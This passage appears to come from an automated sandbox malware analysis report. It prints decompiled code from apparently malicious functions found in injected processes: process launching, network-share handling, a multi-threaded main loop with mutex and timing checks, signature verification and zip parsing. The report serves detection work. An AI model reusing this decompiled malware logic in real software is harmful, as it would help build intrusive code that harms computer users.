                                                • Instruction ID: e1f10b214f6fb472edfcb227621cb8037103cf73bfa6e8c1e51b716a625996ab
                                                • Opcode Fuzzy Hash: 550158e53739d0481e29af591454440079922dc32effe9eb5b489071e4250294
                                                • Instruction Fuzzy Hash: 6941F8F5900111DFCF14DF789494AA9B7B2BF49384B1646A8CD89AB346D771EA02CB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02FAA330 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49processsynchronizationCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 77%
                                                			E02FAA330(WCHAR* __ecx) {
				struct _PROCESS_INFORMATION _v24;
				struct _STARTUPINFOW _v96;
				void* _t19;
				WCHAR* _t20;

				_t20 = __ecx;
				E02FB3440(_t19,  &_v96, 0, 0x44);
				_v96.cb = 0x44;
				_v96.dwFlags = 1;
				_v96.wShowWindow = 5;
				asm("xorps xmm0, xmm0");
				asm("movups [ebp-0x14], xmm0");
				if(CreateProcessW(0, _t20, 0, 0, 0, 0x8000000, 0, 0,  &_v96,  &_v24) == 0) {
					return 0;
				} else {
					WaitForSingleObject(_v24, 0);
					return 1;
				}
			}







                                                0x02faa33d
                                                0x02faa344
                                                0x02faa34c
                                                0x02faa358
                                                0x02faa35f
                                                0x02faa363
                                                0x02faa380
                                                0x02faa38c
                                                0x02faa3a8
                                                0x02faa38e
                                                0x02faa393
                                                0x02faa3a0
                                                0x02faa3a0

                                                APIs
                                                • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,08000000,00000000,00000000,00000044,?,?,745EC0B0), ref: 02FAA384
                                                • WaitForSingleObject.KERNEL32(?,00000000,?,745EC0B0), ref: 02FAA393
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.723617375.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_2fa0000_SearchProtocolHost.jbxd
                                                Similarity
                                                • API ID: CreateObjectProcessSingleWait
                                                • String ID: D
                                                • API String ID: 623904672-2746444292
                                                • Opcode ID: ad7e477876565965216196837f54315a7a5a20a33bb956514be8b616dd7c44e5
                                                • Instruction ID: e45cc1cb7e7a0f24c8c89bdaa3167622e6dd00eca6db0356bac3653f3c98866c
                                                • Opcode Fuzzy Hash: ad7e477876565965216196837f54315a7a5a20a33bb956514be8b616dd7c44e5
                                                • Instruction Fuzzy Hash: 2D01DB71EC020C6AEB109A95DC46FDFF768EB04B54F204116FB14BB1C0E6B264148BA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02FAB1F0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46shareCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 83%
                                                			E02FAB1F0(intOrPtr* __ecx, void* __esi) {
				signed int _v8;
				char _v268;
				char _v528;
				signed int _t12;
				char _t14;
				long _t20;
				intOrPtr* _t25;
				void* _t32;
				signed int _t34;

				_t25 = __ecx;
				_t12 =  *0x2fcf008; // 0x93ad1eea
				_v8 = _t12 ^ _t34;
				_t32 =  &_v268 - __ecx;
				do {
					_t14 =  *_t25;
					_t25 = _t25 + 1;
					 *((char*)(_t32 + _t25 - 1)) = _t14;
				} while (_t14 != 0);
				E02FAA2B0( &_v268);
				E02FA3F90( &_v268,  &_v528, "\\\\%s",  &_v268);
				_t20 = WNetCancelConnection2A( &_v528, 0, 1);
				if(_t20 != 0) {
					SetLastError(_t20);
					return E02FB0A5D(_v8 ^ _t34, __esi);
				} else {
					return E02FB0A5D(_v8 ^ _t34, __esi);
				}
			}












                                                0x02fab1f0
                                                0x02fab1f9
                                                0x02fab200
                                                0x02fab209
                                                0x02fab210
                                                0x02fab210
                                                0x02fab212
                                                0x02fab215
                                                0x02fab219
                                                0x02fab223
                                                0x02fab23b
                                                0x02fab24e
                                                0x02fab256
                                                0x02fab26c
                                                0x02fab281
                                                0x02fab258
                                                0x02fab26a
                                                0x02fab26a

                                                APIs
                                                • WNetCancelConnection2A.MPR(?,00000000,00000001), ref: 02FAB24E
                                                • SetLastError.KERNEL32(00000000), ref: 02FAB26C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.723617375.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_2fa0000_SearchProtocolHost.jbxd
                                                Similarity
                                                • API ID: CancelConnection2ErrorLast
                                                • String ID: \\%s
                                                • API String ID: 822135197-3838199987
                                                • Opcode ID: e35fbff9f6bb7cf30478476b9bf36b11a0c1b57dde5bd18b319b0a9752cfadc6
                                                • Instruction ID: 8b9712c1e80f2fe1ed580c7ee5a3e4763ebdd971473ae715acb68a9a2dd208a7
                                                • Opcode Fuzzy Hash: e35fbff9f6bb7cf30478476b9bf36b11a0c1b57dde5bd18b319b0a9752cfadc6
                                                • Instruction Fuzzy Hash: 7F01F570E4420C9BCB20DFB0DC14BE9B7B9EF15344F1045D9D90ADB142EE32AA488B40
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Executed Functions

                                                Function 028693E0 Relevance: 19.6, APIs: 13, Instructions: 68threadsleepCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                C-Code - Quality: 100%
                                                			E028693E0(void* __eflags) {
				void* _t3;
				long _t15;

				FreeConsole();
				SetUnhandledExceptionFilter(E02869300); // executed
				_t3 = E02869310(); // executed
				if(_t3 != 0) {
					Sleep(0xbb8); // executed
					CreateThread(0, 0, E0286AFC0, 0, 0, 0); // executed
					CreateThread(0, 0, E02866D40, 0, 0, 0); // executed
					CreateThread(0, 0, E0286B470, 0, 0, 0); // executed
					CreateThread(0, 0, E02867C20, 0, 0, 0); // executed
					CreateThread(0, 0, E02865200, 0, 0, 0); // executed
					_t15 = GetTickCount();
					if(GetTickCount() - _t15 >= 0xa4cb80) {
						L4:
						ExitProcess(0);
					} else {
						goto L3;
					}
					do {
						L3:
						Sleep(0xea60); // executed
					} while (GetTickCount() - _t15 < 0xa4cb80);
					goto L4;
				}
				return 0;
			}





                                                0x028693e3
                                                0x028693ee
                                                0x028693f4
                                                0x028693fb
                                                0x0286940e
                                                0x02869425
                                                0x02869436
                                                0x02869447
                                                0x02869458
                                                0x02869469
                                                0x02869473
                                                0x0286947e
                                                0x02869492
                                                0x02869494
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x02869480
                                                0x02869480
                                                0x02869485
                                                0x0286948b
                                                0x00000000
                                                0x02869480
                                                0x02869402

                                                APIs
                                                • FreeConsole.KERNEL32 ref: 028693E3
                                                • SetUnhandledExceptionFilter.KERNEL32(Function_00009300), ref: 028693EE
                                                  • Part of subcall function 02869310: WSAStartup.WS2_32(00000202,?), ref: 02869335
                                                  • Part of subcall function 02869310: CreateMutexA.KERNELBASE ref: 0286937F
                                                  • Part of subcall function 02869310: GetLastError.KERNEL32 ref: 02869387
                                                  • Part of subcall function 02869310: ReleaseMutex.KERNEL32(00000000), ref: 0286939E
                                                  • Part of subcall function 02869310: CloseHandle.KERNEL32(00000000), ref: 028693A5
                                                • Sleep.KERNELBASE(00000BB8), ref: 0286940E
                                                • CreateThread.KERNELBASE(00000000,00000000,Function_0000AFC0,00000000,00000000,00000000), ref: 02869425
                                                • CreateThread.KERNELBASE(00000000,00000000,Function_00006D40,00000000,00000000,00000000), ref: 02869436
                                                • CreateThread.KERNELBASE(00000000,00000000,Function_0000B470,00000000,00000000,00000000), ref: 02869447
                                                • CreateThread.KERNELBASE(00000000,00000000,Function_00007C20,00000000,00000000,00000000), ref: 02869458
                                                • CreateThread.KERNELBASE(00000000,00000000,Function_00005200,00000000,00000000,00000000), ref: 02869469
                                                • GetTickCount.KERNEL32 ref: 02869471
                                                • GetTickCount.KERNEL32 ref: 02869475
                                                • Sleep.KERNELBASE(0000EA60), ref: 02869485
                                                • GetTickCount.KERNEL32 ref: 02869487
                                                • ExitProcess.KERNEL32 ref: 02869494
                                                Memory Dump Source
                                                • Source File: 00000017.00000002.749016186.0000000002860000.00000040.00000400.00020000.00000000.sdmp, Offset: 02860000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_23_2_2860000_dllhost.jbxd
                                                Similarity
                                                • API ID: Create$Thread$CountTick$MutexSleep$CloseConsoleErrorExceptionExitFilterFreeHandleLastProcessReleaseStartupUnhandled
                                                • String ID:
                                                • API String ID: 4116069078-0
                                                • Opcode ID: 4fe48fdc6b43e8ae49e55e1605aa4bf18c7e0cd131ea6e0fe70b617791d5824c
                                                • Instruction ID: 86a173acb3b58f330bf09eb505bc75a77cb559819f6f072cee56792834adde45
                                                • Opcode Fuzzy Hash: 4fe48fdc6b43e8ae49e55e1605aa4bf18c7e0cd131ea6e0fe70b617791d5824c
                                                • Instruction Fuzzy Hash: 4D11083DBD432876F57026B95C4FF292E449B40F65F754812F309FE1C089D8744189AE
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02864920 Relevance: 10.6, APIs: 7, Instructions: 71encryptionCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                C-Code - Quality: 28%
                                                			E02864920(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				long* _v12;
				long* _v16;
				int _t16;
				char* _t20;
				intOrPtr _t21;
				void* _t24;
				void* _t27;
				long* _t30;

				_t16 = CryptAcquireContextA( &_v12, 0, 0, 1, 0xf0000000); // executed
				if(_t16 != 0) {
					if(CryptImportKey(_v12, 0x2890ce0, 0x94, 0, 0,  &_v16) == 0) {
						goto L1;
					} else {
						_t20 =  &_v8;
						__imp__CryptCreateHash(_v12, 0x8003, 0, 0, _t20);
						if(_t20 == 0) {
							goto L1;
						} else {
							__imp__CryptHashData(_v8, _a4, _a8, 0);
							if(_t20 == 0) {
								goto L1;
							} else {
								__imp__CryptVerifySignatureA(_v8, _a12, _a16, _v16, 0, 0, _t24);
								_t21 = _v8;
								_t27 =  !=  ? 1 : 0;
								if(_t21 != 0) {
									__imp__CryptDestroyHash(_t21);
								}
								_t30 = _v12;
								if(_t30 != 0) {
									CryptReleaseContext(_t30, 0);
								}
								return _t27;
							}
						}
					}
				} else {
					L1:
					return 0;
				}
			}












                                                0x02864935
                                                0x0286493d
                                                0x02864962
                                                0x00000000
                                                0x02864964
                                                0x02864964
                                                0x02864974
                                                0x0286497c
                                                0x00000000
                                                0x0286497e
                                                0x02864989
                                                0x02864991
                                                0x00000000
                                                0x02864993
                                                0x028649a6
                                                0x028649b1
                                                0x028649b9
                                                0x028649be
                                                0x028649c1
                                                0x028649c1
                                                0x028649c7
                                                0x028649cc
                                                0x028649d1
                                                0x028649d1
                                                0x028649dd
                                                0x028649dd
                                                0x02864991
                                                0x0286497c
                                                0x0286493f
                                                0x0286493f
                                                0x02864944
                                                0x02864944

                                                APIs
                                                • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,00000050,?,?), ref: 02864935
                                                • CryptImportKey.ADVAPI32(00000000,02890CE0,00000094,00000000,00000000,?), ref: 0286495A
                                                • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,?), ref: 02864974
                                                • CryptHashData.ADVAPI32(00000000,?,?,00000000), ref: 02864989
                                                • CryptVerifySignatureA.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?), ref: 028649A6
                                                • CryptDestroyHash.ADVAPI32(?), ref: 028649C1
                                                • CryptReleaseContext.ADVAPI32(?,00000000), ref: 028649D1
                                                Memory Dump Source
                                                • Source File: 00000017.00000002.749016186.0000000002860000.00000040.00000400.00020000.00000000.sdmp, Offset: 02860000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_23_2_2860000_dllhost.jbxd
                                                Similarity
                                                • API ID: Crypt$Hash$Context$AcquireCreateDataDestroyImportReleaseSignatureVerify
                                                • String ID:
                                                • API String ID: 949692108-0
                                                • Opcode ID: 36c361e7b2ada869a74f4cb37778e26fbfdeb413ce90ba1c0ebba911e09de2fc
                                                • Instruction ID: b30f186ef09dded09c147370a04b5c9cb4e8120ad25bb28df0430c69ded0dc79
                                                • Opcode Fuzzy Hash: 36c361e7b2ada869a74f4cb37778e26fbfdeb413ce90ba1c0ebba911e09de2fc
                                                • Instruction Fuzzy Hash: 75214C3DBC0308BBEF218EA4DC0AFAD7BA9BB04B05F500054FA04E61D0D7759A209A54
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0286F4E0 Relevance: 9.2, APIs: 1, Strings: 4, Instructions: 467COMMONCrypto
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 340 286f4e0-286f510 341 286f516-286f51b 340->341 342 286fae2-286fafb call 2870a5d 340->342 341->342 343 286f521-286f525 341->343 346 286f527 call 286f2d0 343->346 347 286f52c-286f539 343->347 346->347 349 286f565-286f568 347->349 350 286f53b-286f53e 347->350 351 286f56a-286f5e5 call 2870a5d 349->351 352 286f5e8-286f5ed 349->352 350->351 353 286f540-286f562 call 2870a5d 350->353 355 286f5f4-286f5f9 352->355 356 286f5ef call 286ec60 352->356 361 286f654-286f68e call 286e7c0 call 286eca0 355->361 362 286f5fb-286f5fd 355->362 356->355 373 286f690-286f6a9 call 2870a5d 361->373 374 286f6ac-286f6b6 call 286e170 361->374 364 286f600-286f604 362->364 366 286f606-286f60a 364->366 367 286f649-286f64e 364->367 366->367 370 286f60c-286f613 366->370 367->364 368 286f650 367->368 368->361 370->367 372 286f615-286f639 call 286e7c0 370->372 378 286f63e-286f646 372->378 380 286f6bb-286f6c0 374->380 378->367 381 286f6c2-286f6ef call 2870ab4 call 286e200 380->381 382 286f6fa-286f713 call 2870a5d 380->382 389 286f716-286f71f 381->389 390 286f6f1-286f6f7 call 2870aaf 381->390 392 286f720-286f733 389->392 390->382 392->392 394 286f735-286f73c 392->394 395 286f740-286f744 394->395 396 286f746-286f74a 395->396 397 286f751-286f753 395->397 396->397 398 286f74c-286f74f 396->398 399 286f755-286f756 397->399 400 286f758-286f75a 397->400 398->395 399->395 401 286f75f-286f76f call 2875fff 400->401 402 286f75c-286f75d 400->402 405 286f776-286f786 call 2875fff 401->405 406 286f771-286f774 401->406 402->395 409 286f78d-286f79d call 2875fff 405->409 410 286f788-286f78b 405->410 406->395 413 286f7a4-286f7b4 call 2875fff 409->413 414 286f79f-286f7a2 409->414 410->395 417 286f7b6-286f7b9 413->417 418 286f7bb-286f7be 413->418 414->395 417->395 419 286f7c0-286f7cb 418->419 419->419 420 286f7cd-286f801 419->420 421 286f812-286f847 420->421 422 286f803-286f806 420->422 424 286f84b-286f864 421->424 422->421 423 286f808-286f80b 422->423 423->421 425 286f80d-286f810 423->425 426 286f866 424->426 427 286f86d-286f872 424->427 425->421 425->424 426->427 428 286f874 427->428 429 286f87b-286f87d 427->429 428->429 430 286f886-286f88b 429->430 431 286f87f 429->431 432 286f894-286f901 call 286f350 LocalFileTimeToFileTime 430->432 433 286f88d 430->433 431->430 436 286f907-286f913 432->436 437 286fa9f 432->437 433->432 438 286f924-286f93d 436->438 439 286faa3-286faa5 437->439 440 286f940-286f944 438->440 441 286faa7-286faad call 2870aaf 439->441 442 286fab0-286fadf call 2870a5d 439->442 443 286f946-286f948 440->443 444 286f960-286f962 440->444 441->442 447 286f95c-286f95e 443->447 448 286f94a-286f950 443->448 450 286f965-286f967 444->450 447->450 448->444 452 286f952-286f95a 448->452 453 286f988-286f9ba 450->453 454 286f969-286f981 450->454 452->440 452->447 455 286f9bc-286fa05 453->455 456 286fa09-286fa0b 453->456 457 286f983 454->457 458 286f920 454->458 455->456 459 286fa52-286fa57 456->459 460 286fa0d-286fa4f 456->460 457->439 458->438 459->437 461 286fa59-286fa9c 459->461 460->459 461->437
                                                C-Code - Quality: 84%
                                                			E0286F4E0(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, signed int _a4, void* _a8) {
				signed int _v8;
				char _v276;
				char _v540;
				unsigned int _v568;
				signed int _v592;
				signed int _v596;
				unsigned int _v604;
				unsigned int _v620;
				struct _FILETIME _v628;
				struct _FILETIME _v636;
				intOrPtr* _v640;
				signed int _v644;
				signed int _v648;
				signed int _v652;
				signed int _v656;
				char _v658;
				char _v659;
				signed int _v660;
				signed int _v664;
				void* __esi;
				signed int _t195;
				signed int _t199;
				signed int _t204;
				signed int _t205;
				signed int _t208;
				void* _t209;
				signed int _t212;
				signed int _t213;
				signed int _t214;
				signed int _t215;
				signed int _t216;
				signed int _t217;
				signed int _t218;
				signed int _t223;
				signed int _t235;
				signed int _t244;
				signed int _t250;
				signed int _t253;
				signed int _t254;
				signed char _t255;
				signed int _t262;
				signed int _t264;
				signed int _t270;
				signed int _t271;
				signed int _t273;
				signed int _t279;
				signed int _t280;
				signed int _t282;
				signed int _t289;
				signed int _t294;
				signed int _t296;
				void* _t307;
				signed int _t312;
				signed int _t319;
				signed int _t328;
				signed int _t330;
				signed char _t334;
				long _t338;
				signed int _t339;
				intOrPtr* _t345;
				signed int _t348;
				signed int _t356;
				signed int _t361;
				unsigned int _t380;
				unsigned int _t382;
				void* _t383;
				signed int _t384;
				signed int _t385;
				signed int _t390;
				intOrPtr _t392;
				signed int* _t395;
				signed int _t409;
				void* _t410;
				void* _t411;
				intOrPtr* _t413;
				void* _t414;
				void* _t416;
				void* _t417;
				void* _t418;
				void* _t419;
				void* _t421;
				signed int _t422;
				signed int _t424;
				signed int _t427;
				signed int _t428;
				void* _t430;

				_t424 = (_t422 & 0xfffffff8) - 0x294;
				_t195 =  *0x288f008; // 0xe7fe870c
				_v8 = _t195 ^ _t424;
				_t307 = _a8;
				_t409 = _a4;
				_v652 = _t307;
				_t395 = __ecx;
				_v640 = __ecx;
				if(_t409 < 0xffffffff) {
					L81:
					_pop(_t410);
					__eflags = _v8 ^ _t424;
					return E02870A5D(_v8 ^ _t424, _t410);
				} else {
					_t318 =  *__ecx;
					if(_t409 >=  *((intOrPtr*)( *__ecx + 4))) {
						goto L81;
					} else {
						if( *((intOrPtr*)(__ecx + 4)) != 0xffffffff) {
							E0286F2D0(_t318, __edx);
						}
						_t395[1] = 0xffffffff;
						if(_t409 != _t395[0x4d]) {
							__eflags = _t409 - 0xffffffff;
							if(_t409 != 0xffffffff) {
								_t319 =  *_t395;
								__eflags = _t409 -  *((intOrPtr*)(_t319 + 0x10));
								if(_t409 <  *((intOrPtr*)(_t319 + 0x10))) {
									E0286EC60(_t319);
								}
								_t199 =  *_t395;
								__eflags =  *((intOrPtr*)(_t199 + 0x10)) - _t409;
								if( *((intOrPtr*)(_t199 + 0x10)) < _t409) {
									_t312 = _t409;
									do {
										_t409 =  *_t395;
										__eflags = _t409;
										if(_t409 != 0) {
											__eflags =  *(_t409 + 0x18);
											if( *(_t409 + 0x18) != 0) {
												_t392 =  *((intOrPtr*)(_t409 + 0x10)) + 1;
												__eflags = _t392 -  *((intOrPtr*)(_t409 + 4));
												if(_t392 !=  *((intOrPtr*)(_t409 + 4))) {
													 *((intOrPtr*)(_t409 + 0x10)) = _t392;
													 *((intOrPtr*)(_t409 + 0x14)) =  *((intOrPtr*)(_t409 + 0x14)) +  *((intOrPtr*)(_t409 + 0x48)) + 0x2e +  *((intOrPtr*)(_t409 + 0x50)) +  *((intOrPtr*)(_t409 + 0x4c));
													_t294 = E0286E7C0(_t409, _t409 + 0x28, _t409 + 0x78, 0, 0); // executed
													_t424 = _t424 - 0x10 + 0x1c;
													asm("sbb eax, eax");
													_t296 =  ~_t294 + 1;
													__eflags = _t296;
													 *(_t409 + 0x18) = _t296;
												}
											}
										}
										_t289 =  *_t395;
										__eflags =  *((intOrPtr*)(_t289 + 0x10)) - _t312;
									} while ( *((intOrPtr*)(_t289 + 0x10)) < _t312);
									_t307 = _v652;
								}
								E0286E7C0( *_t395,  &_v620, 0,  &_v540, 0x104); // executed
								_t204 = E0286ECA0( *_t395,  &_v648, __eflags,  &_v652,  &_v664); // executed
								_t427 = _t424 - 0x10 + 0x24;
								__eflags = _t204;
								if(_t204 == 0) {
									_t205 = E0286E170( *( *_t395), _v652, 0); // executed
									_t428 = _t427 + 4;
									__eflags = _t205;
									if(__eflags != 0) {
										L24:
										_pop(_t411);
										__eflags = _v8 ^ _t428;
										return E02870A5D(_v8 ^ _t428, _t411);
									} else {
										_push(_v664);
										_t208 = E02870AB4(_t409, __eflags);
										_t412 = _t208;
										_v656 = _t208;
										_t209 = E0286E200(_t208, 1, _v664,  *( *_t395));
										_t430 = _t428 + 0xc;
										__eflags = _t209 - _v664;
										if(_t209 == _v664) {
											_t328 = 0;
											__eflags = 0;
											 *_t307 =  *( *_t395 + 0x10);
											do {
												_t212 =  *((intOrPtr*)(_t430 + _t328 + 0x88));
												_t328 = _t328 + 1;
												 *((char*)(_t430 + _t328 + 0x18f)) = _t212;
												__eflags = _t212;
											} while (_t212 != 0);
											_t413 =  &_v276;
											while(1) {
												_t213 =  *_t413;
												__eflags = _t213;
												if(_t213 == 0) {
													goto L31;
												}
												L29:
												__eflags =  *((char*)(_t413 + 1)) - 0x3a;
												if( *((char*)(_t413 + 1)) == 0x3a) {
													_t413 = _t413 + 2;
													while(1) {
														_t213 =  *_t413;
														__eflags = _t213;
														if(_t213 == 0) {
															goto L31;
														}
														goto L29;
													}
												}
												L31:
												__eflags = _t213 - 0x5c;
												if(_t213 == 0x5c) {
													_t413 = _t413 + 1;
													while(1) {
														_t213 =  *_t413;
														__eflags = _t213;
														if(_t213 == 0) {
															goto L31;
														}
														goto L29;
													}
												}
												__eflags = _t213 - 0x2f;
												if(_t213 == 0x2f) {
													_t413 = _t413 + 1;
													while(1) {
														_t213 =  *_t413;
														__eflags = _t213;
														if(_t213 == 0) {
															goto L31;
														}
														goto L29;
													}
												}
												_t214 = E02875FFF(_t413, "\\..\\");
												_t430 = _t430 + 8;
												__eflags = _t214;
												if(_t214 != 0) {
													_t61 = _t214 + 4; // 0x4
													_t413 = _t61;
													while(1) {
														_t213 =  *_t413;
														__eflags = _t213;
														if(_t213 == 0) {
															goto L31;
														}
														goto L29;
													}
												}
												_t215 = E02875FFF(_t413, "\\../");
												_t430 = _t430 + 8;
												__eflags = _t215;
												if(_t215 != 0) {
													_t62 = _t215 + 4; // 0x4
													_t413 = _t62;
													while(1) {
														_t213 =  *_t413;
														__eflags = _t213;
														if(_t213 == 0) {
															goto L31;
														}
														goto L29;
													}
												}
												_t216 = E02875FFF(_t413, "/../");
												_t430 = _t430 + 8;
												__eflags = _t216;
												if(_t216 != 0) {
													_t63 = _t216 + 4; // 0x4
													_t413 = _t63;
													while(1) {
														_t213 =  *_t413;
														__eflags = _t213;
														if(_t213 == 0) {
															goto L31;
														}
														goto L29;
													}
													goto L31;
												}
												_t217 = E02875FFF(_t413, "/..\\");
												_t430 = _t430 + 8;
												__eflags = _t217;
												if(_t217 != 0) {
													_t64 = _t217 + 4; // 0x4
													_t413 = _t64;
													continue;
												}
												_t65 = _t307 + 4; // 0x2865092
												_t330 = _t65 - _t413;
												__eflags = _t330;
												do {
													_t218 =  *_t413;
													_t413 = _t413 + 1;
													 *((char*)(_t330 + _t413 - 1)) = _t218;
													__eflags = _t218;
												} while (_t218 != 0);
												_t380 = _v568;
												_v660 = _t380 >> 0x0000001e & 0xffffff01;
												_t334 =  !(_t380 >> 0x17) & 0x00000001;
												_t223 = _v620 >> 8;
												_v648 = 0;
												_v652 = 0;
												_v644 = 1;
												__eflags = _t223;
												if(_t223 == 0) {
													L49:
													_t334 = _t380 & 0x00000001;
													_v648 = _t380 >> 0x00000001 & 0xffffff01;
													_v652 = _t380 >> 0x00000002 & 0xffffff01;
													_v660 = _t380 >> 0x00000004 & 0x00000001;
													_t235 = _t380 >> 0x00000005 & 0xffffff01;
													__eflags = _t235;
													_v644 = _t235;
												} else {
													__eflags = _t223 - 7;
													if(_t223 == 7) {
														goto L49;
													} else {
														__eflags = _t223 - 0xb;
														if(_t223 == 0xb) {
															goto L49;
														} else {
															__eflags = _t223 - 0xe;
															if(_t223 == 0xe) {
																goto L49;
															}
														}
													}
												}
												__eflags = _v660;
												_t237 =  !=  ? 0x10 : 0;
												__eflags = _v644;
												 *(_t307 + 0x108) =  !=  ? 0x10 : 0;
												if(_v644 != 0) {
													_t82 = _t307 + 0x108;
													 *_t82 =  *(_t307 + 0x108) | 0x00000020;
													__eflags =  *_t82;
												}
												__eflags = _v648;
												if(_v648 != 0) {
													_t85 = _t307 + 0x108;
													 *_t85 =  *(_t307 + 0x108) | 0x00000002;
													__eflags =  *_t85;
												}
												__eflags = _t334;
												if(_t334 != 0) {
													_t87 = _t307 + 0x108;
													 *_t87 =  *(_t307 + 0x108) | 0x00000001;
													__eflags =  *_t87;
												}
												__eflags = _v652;
												if(_v652 != 0) {
													_t90 = _t307 + 0x108;
													 *_t90 =  *(_t307 + 0x108) | 0x00000004;
													__eflags =  *_t90;
												}
												_t382 = _v604;
												 *(_t307 + 0x124) = _v596;
												 *(_t307 + 0x128) = _v592;
												_v636.dwLowDateTime = E0286F350(_t382 >> 0x10, _t382);
												_v636.dwHighDateTime = _t382;
												LocalFileTimeToFileTime( &_v636,  &_v628);
												_t338 = _v628.dwLowDateTime;
												_t414 = 0;
												__eflags = _v664 - 4;
												_t244 = _v628.dwHighDateTime;
												 *(_t307 + 0x10c) = _t338;
												 *(_t307 + 0x110) = _t244;
												 *(_t307 + 0x114) = _t338;
												 *(_t307 + 0x118) = _t244;
												 *(_t307 + 0x11c) = _t338;
												 *(_t307 + 0x120) = _t244;
												if(_v664 <= 4) {
													L77:
													_t339 = _v656;
												} else {
													_t250 = _v656;
													_v658 = 0;
													_t383 = _t250 + 1;
													while(1) {
														L61:
														_t345 = "UT";
														_v660 =  *(_t414 + _t250) & 0x000000ff;
														_v659 =  *(_t383 + _t414) & 0x000000ff;
														_t253 =  &_v660;
														while(1) {
															_t384 =  *_t253;
															__eflags = _t384 -  *_t345;
															if(_t384 !=  *_t345) {
																break;
															}
															__eflags = _t384;
															if(_t384 == 0) {
																L66:
																_t254 = 0;
															} else {
																_t390 =  *((intOrPtr*)(_t253 + 1));
																_t120 = _t345 + 1; // 0x25000054
																__eflags = _t390 -  *_t120;
																if(_t390 !=  *_t120) {
																	break;
																} else {
																	_t253 = _t253 + 2;
																	_t345 = _t345 + 2;
																	__eflags = _t390;
																	if(_t390 != 0) {
																		continue;
																	} else {
																		goto L66;
																	}
																}
															}
															L68:
															__eflags = _t254;
															if(_t254 == 0) {
																_t385 = _v656;
																_v660 = 0x989680;
																_t255 =  *(_t414 + _t385 + 4) & 0x000000ff;
																_t417 = _t414 + 5;
																_v664 = _t255;
																_v664 = _v664 >> 2;
																_v664 = _v664 & 0x00000001;
																_t348 = _t255 >> 0x00000001 & 0xffffff01;
																_v652 = _t348;
																__eflags = _t255 & 0x00000001;
																if((_t255 & 0x00000001) != 0) {
																	_t361 =  *(_t417 + _t385) & 0x000000ff;
																	_t279 = ((( *(_t417 + _t385 + 3) & 0x000000ff) << 0x00000008 |  *(_t417 + _t385 + 2) & 0x000000ff) << 0x00000008 |  *(_t417 + _t385 + 1) & 0x000000ff) << 8;
																	_t417 = _t417 + 4;
																	_t280 = _t279 | _t361;
																	_t282 = _t280 * _v660 + 0xd53e8000;
																	__eflags = _t282;
																	 *(_t307 + 0x11c) = _t282;
																	asm("adc edx, 0x19db1de");
																	 *(_t307 + 0x120) = _t280 * _v660 >> 0x20;
																	_t385 = _v656;
																	_t348 = _v652;
																}
																__eflags = _t348;
																if(_t348 != 0) {
																	_t356 =  *(_t417 + _t385) & 0x000000ff;
																	_t270 = ((( *(_t417 + _t385 + 3) & 0x000000ff) << 0x00000008 |  *(_t417 + _t385 + 2) & 0x000000ff) << 0x00000008 |  *(_t417 + _t385 + 1) & 0x000000ff) << 8;
																	_t417 = _t417 + 4;
																	_t271 = _t270 | _t356;
																	_t273 = _t271 * _v660 + 0xd53e8000;
																	__eflags = _t273;
																	 *(_t307 + 0x10c) = _t273;
																	asm("adc edx, 0x19db1de");
																	 *(_t307 + 0x110) = _t271 * _v660 >> 0x20;
																}
																__eflags = _v664;
																if(_v664 != 0) {
																	_t262 = ((( *(_t417 + _v656 + 3) & 0x000000ff) << 0x00000008 |  *(_t417 + _v656 + 2) & 0x000000ff) << 0x00000008 |  *(_t417 + _v656 + 1) & 0x000000ff) << 0x00000008 |  *(_t417 + _t386) & 0x000000ff;
																	_t264 = _t262 * _v660 + 0xd53e8000;
																	__eflags = _t264;
																	 *(_t307 + 0x114) = _t264;
																	asm("adc edx, 0x19db1de");
																	 *(_t307 + 0x118) = _t262 * _v660 >> 0x20;
																}
																goto L77;
															} else {
																_t339 = _v656;
																_t383 = _t339 + 1;
																_t414 = _t414 + ( *(_t414 + _t339 + 2) & 0x000000ff) + 4;
																_t125 = _t414 + 4; // 0x4
																__eflags = _t125 - _v664;
																if(_t125 < _v664) {
																	_t250 = _v656;
																	goto L61;
																} else {
																}
															}
															goto L78;
														}
														asm("sbb eax, eax");
														_t254 = _t253 | 0x00000001;
														__eflags = _t254;
														goto L68;
													}
												}
												L78:
												__eflags = _t339;
												if(_t339 != 0) {
													E02870AAF(_t339);
													_t430 = _t430 + 4;
												}
												 *(memcpy( &(_t395[2]), _t307, 0x4b << 2) + 0x134) = _a4;
												_pop(_t416);
												__eflags = _v8 ^ _t430 + 0xc;
												return E02870A5D(_v8 ^ _t430 + 0xc, _t416);
												goto L82;
											}
										} else {
											E02870AAF(_t412);
											_t428 = _t430 + 4;
											goto L24;
										}
									}
								} else {
									_pop(_t418);
									__eflags = _v8 ^ _t427;
									return E02870A5D(_v8 ^ _t427, _t418);
								}
